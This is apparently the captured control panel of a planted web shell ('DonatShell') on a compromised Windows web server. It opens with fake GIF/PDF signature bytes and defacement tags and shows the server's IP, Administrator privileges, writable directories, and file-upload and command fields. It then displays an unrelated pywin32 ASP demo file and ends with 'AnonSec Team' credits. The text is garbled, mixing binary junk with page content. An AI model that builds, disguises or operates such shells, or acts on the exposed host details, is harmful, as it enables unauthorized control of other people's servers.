GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Program Files (x86)/Certbot/pkgs/win32comext/axscript/Demos/client/asp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /Program Files (x86)/Certbot/pkgs/win32comext/axscript/Demos/client/asp//caps.asp
<%@ Language=Python %>
<HTML>

<HEAD>

<BODY BACKGROUND="/samples/images/backgrnd.gif">

<TITLE>Python test</TITLE>

</HEAD>

<BODY BGCOLOR="FFFFFF">

<SCRIPT Language="Python" RUNAT=Server>
# NOTE that the <% tags below execute _before_ these tags!
Response.Write("Hello from Python<P>")
Response.Write("Browser is "+bc.browser)
import win32api # Should be no problem using win32api in ASP pages.
Response.Write("<p>Win32 username is "+win32api.GetUserName())
</SCRIPT>

<BODY BGCOLOR="FFFFFF">

<% 
import sys
print sys.path
from win32com.axscript.asputil import *
print "Hello"
print "There"
print "How are you"
%>

<%bc = Server.CreateObject("MSWC.BrowserType")%>
<BODY BGCOLOR="FFFFFF">
<table border=1> 
<tr><td>Browser</td><td> <%=bc.browser %> 
<tr><td>Version</td><td> <%=bc.version %> </td></TR> 
<tr><td>Frames</td><td> 
<%Response.Write( iif(bc.frames, "TRUE", "FALSE")) %></td></TR> 
<tr><td>Tables</td><td> 
<%Response.Write( iif (bc.tables, "TRUE", "FALSE")) %></td></TR> 
<tr><td>BackgroundSounds</td><td> 
<%Response.Write( iif(bc.BackgroundSounds, "TRUE", "FALSE"))%></td></TR> 
<tr><td>VBScript</td><td> 
<%Response.Write( iif(bc.vbscript, "TRUE", "FALSE"))%></td></TR> 
<tr><td>JavaScript</td><td> 
<%Response.Write( iif(bc.javascript, "TRUE", "FALSE"))%></td></TR> 

</table> 

</body>
</html>

Anon7 - 2022
AnonSec Team